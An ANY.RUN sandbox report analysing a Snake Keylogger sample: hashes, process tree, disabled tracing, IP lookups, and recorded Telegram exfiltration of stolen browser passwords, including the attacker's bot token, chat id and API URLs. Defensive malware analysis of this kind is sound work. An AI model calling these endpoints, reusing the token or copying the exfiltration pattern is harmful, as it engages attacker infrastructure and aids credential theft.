File name:

0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac

Full analysis: https://app.any.run/tasks/7f79c2ab-a86a-4d25-ba18-5e90377031c5
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Malware Trends Tracker     >>>
Analysis date: January 10, 2025, 23:38:25
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
snake
keylogger
stealer
telegram
ims-api
generic
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

5525E92284B32082E959D9D4F58F44D6

SHA1:

E28870B31D2FC0B1C1CED9BD4102B9C0BA2A13D7

SHA256:

0B7718C1C06EC823438B84C44B1D0CCEDFCD24F73AAD0B83E63D7E20924796AC

SSDEEP:

49152:sHlGAXWQkC2R/QORBt7QjFtmcaTH/vU4do9Pcjq1GvXB1sgPR8N32+Rr181vWDZx:dAGQX21RBt7QjTmcaTH/vU4do9Pcjq1n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Steals credentials from Web Browsers

      • RegSvcs.exe (PID: 3560)

    • Actions looks like stealing of personal data

      • RegSvcs.exe (PID: 3560)

    • SNAKEKEYLOGGER has been detected (SURICATA)

      • RegSvcs.exe (PID: 3560)

  • SUSPICIOUS

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • RegSvcs.exe (PID: 3560)

    • The process verifies whether the antivirus software is installed

      • RegSvcs.exe (PID: 3560)

    • Checks for external IP

      • svchost.exe (PID: 2192)
      • RegSvcs.exe (PID: 3560)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • RegSvcs.exe (PID: 3560)

  • INFO

    • Reads mouse settings

      • 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe (PID: 5200)

    • Disables trace logs

      • RegSvcs.exe (PID: 3560)

    • Attempting to use instant messaging service

      • svchost.exe (PID: 2192)
      • RegSvcs.exe (PID: 3560)

    • Checks supported languages

      • RegSvcs.exe (PID: 3560)
      • 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe (PID: 5200)

    • Reads the computer name

      • RegSvcs.exe (PID: 3560)

    • Create files in a temporary directory

      • 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe (PID: 5200)

    • The sample compiled with english language support

      • 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe (PID: 5200)

    • Checks proxy server information

      • RegSvcs.exe (PID: 3560)

    • Reads the machine GUID from the registry

      • RegSvcs.exe (PID: 3560)

    • Reads the software policy settings

      • RegSvcs.exe (PID: 3560)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(3560) RegSvcs.exe
Telegram-Tokens (1)7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
Telegram-Info-Links
7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
Get info about bothttps://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/getMe
Get incoming updateshttps://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/getUpdates
Get webhookhttps://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
End-PointsendDocument
Args
chat_id (1)5839829477
caption (1)admin / Passwords / 181.214.173.66
Token7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
End-PointsendDocument
Args
chat_id (1)5839829477
caption (1)admin / Passwords / 181.214.173.66 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31cfeae47581 Host: api.telegram.org Content-Length: 1097 Connection: Keep-Alive
Token7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
End-PointsendDocument
Args
chat_id (1)5839829477
caption (1)admin / Passwords / 181.214.173.66
Telegram-Responses
oktrue
result
message_id95528
from
id7708662779
is_bottrue
first_nameNOVA
usernameSkullsnovabot
chat
id5839829477
first_nameMakwanda
last_nameSkulls
usernameBig4m
typeprivate
date1736552322
document
file_nameUserdata.txt
mime_typetext/plain
file_idBQACAgQAAxkDAAEBdShnga-C-cdRKZYmPa5tjJE28ZeQOgACjxgAAlxqEVDrd-xHruSzkzYE
file_unique_idAgADjxgAAlxqEVA
file_size902
captionadmin / Passwords / 181.214.173.66
caption_entities
offset20
length14
typeurl
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

CharacterSet: Unicode
LanguageCode: English (British)
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x0000
ProductVersionNumber: 0.0.0.0
FileVersionNumber: 0.0.0.0
Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0x27dcd
UninitializedDataSize: -
InitializedDataSize: 374272
CodeSize: 581120
LinkerVersion: 12
PEType: PE32
ImageFileCharacteristics: Executable, Large address aware, 32-bit
TimeStamp: 2024:12:18 23:15:33+00:00
MachineType: Intel 386 or later, and compatibles
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
130
Monitored processes
3
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe no specs #SNAKEKEYLOGGER regsvcs.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
5200"C:\Users\admin\AppData\Local\Temp\0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe" C:\Users\admin\AppData\Local\Temp\0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\psapi.dll
3560"C:\Users\admin\AppData\Local\Temp\0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Services Installation Utility
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
ims-api
(PID) Process(3560) RegSvcs.exe
Telegram-Tokens (1)7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
Telegram-Info-Links
7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
Get info about bothttps://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/getMe
Get incoming updateshttps://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/getUpdates
Get webhookhttps://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
End-PointsendDocument
Args
chat_id (1)5839829477
caption (1)admin / Passwords / 181.214.173.66
Token7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
End-PointsendDocument
Args
chat_id (1)5839829477
caption (1)admin / Passwords / 181.214.173.66 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31cfeae47581 Host: api.telegram.org Content-Length: 1097 Connection: Keep-Alive
Token7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
End-PointsendDocument
Args
chat_id (1)5839829477
caption (1)admin / Passwords / 181.214.173.66
Telegram-Responses
oktrue
result
message_id95528
from
id7708662779
is_bottrue
first_nameNOVA
usernameSkullsnovabot
chat
id5839829477
first_nameMakwanda
last_nameSkulls
usernameBig4m
typeprivate
date1736552322
document
file_nameUserdata.txt
mime_typetext/plain
file_idBQACAgQAAxkDAAEBdShnga-C-cdRKZYmPa5tjJE28ZeQOgACjxgAAlxqEVDrd-xHruSzkzYE
file_unique_idAgADjxgAAlxqEVA
file_size902
captionadmin / Passwords / 181.214.173.66
caption_entities
offset20
length14
typeurl
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
Total events
1 060
Read events
1 046
Write events
14
Delete events
0

Modification events

(PID) Process:(3560) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3560) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3560) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3560) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(3560) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(3560) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3560) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3560) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3560) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3560) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
0
Suspicious files
3
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
52000b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exeC:\Users\admin\AppData\Local\Temp\aut6805.tmpbinary
MD5:BF7D4A61CFFF11CE70DAE67EA27A26ED
SHA256:7CA9EE581D9322AA5CFC49FA8D65F191AC56A02BA9326D4A87DF6E43FD50D7B8
52000b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exeC:\Users\admin\AppData\Local\Temp\Idonnatext
MD5:1837FB67828BB51BED9520F7BEA06B8F
SHA256:CA493C35B1FFDF8EE3D1548611CCD4FCA8D3D75F02B178CFFC1704CDD3F0B683
52000b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exeC:\Users\admin\AppData\Local\Temp\aut665E.tmpbinary
MD5:3455AC91B92892468715125CB95827CE
SHA256:2FFEA27C3E08D14745CDC53E0BFEC729170029728C49AC6936874BD0C6A355B6
52000b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exeC:\Users\admin\AppData\Local\Temp\anabolybinary
MD5:32958FBA6DD1673ADB2A6C59C01EA5F6
SHA256:EEA901FA762BCD34921B5BF646C0F23B4C7F99D9A880C53EC91881271D89D535
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
35
DNS requests
20
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
3560
RegSvcs.exe
GET
200
132.226.247.73:80
http://checkip.dyndns.org/
unknown
malicious
5236
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5236
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5488
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
3560
RegSvcs.exe
GET
200
132.226.247.73:80
http://checkip.dyndns.org/
unknown
malicious
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
3560
RegSvcs.exe
GET
200
132.226.247.73:80
http://checkip.dyndns.org/
unknown
malicious
5488
svchost.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
4
System
192.168.100.255:138
unknown
4712
MoUsoCoreWorker.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
5488
svchost.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5488
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
104.126.37.179:443
www.bing.com
Akamai International B.V.
DE
unknown
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
unknown
3560
RegSvcs.exe
132.226.247.73:80
checkip.dyndns.org
ORACLE-BMC-31898
BR
unknown
3560
RegSvcs.exe
104.21.32.1:443
reallyfreegeoip.org
CLOUDFLARENET
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 4.231.128.59
unknown
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.156
unknown
www.microsoft.com
  • 184.30.21.171
unknown
google.com
  • 142.250.186.142
unknown
www.bing.com
  • 104.126.37.179
  • 104.126.37.144
  • 104.126.37.171
  • 104.126.37.129
  • 104.126.37.139
  • 104.126.37.170
  • 104.126.37.128
  • 104.126.37.155
  • 104.126.37.185
unknown
ocsp.digicert.com
  • 192.229.221.95
unknown
checkip.dyndns.org
  • 132.226.247.73
  • 132.226.8.169
  • 193.122.130.0
  • 158.101.44.242
  • 193.122.6.168
unknown
reallyfreegeoip.org
  • 104.21.32.1
  • 104.21.64.1
  • 104.21.48.1
  • 104.21.96.1
  • 104.21.16.1
  • 104.21.112.1
  • 104.21.80.1
unknown
login.live.com
  • 40.126.32.72
  • 40.126.32.68
  • 40.126.32.140
  • 40.126.32.133
  • 20.190.160.22
  • 40.126.32.134
  • 20.190.160.14
  • 20.190.160.17
unknown
api.telegram.org
  • 149.154.167.220
unknown

Threats

PID
Process
Class
Message
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Query (checkip .dyndns .org)
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected
ET INFO 404/Snake/Matiex Keylogger Style External IP Check
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)
Misc activity
ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org)
Misc activity
ET INFO External IP Lookup Service Domain (reallyfreegeoip .org) in TLS SNI
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup - checkip.dyndns.org
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac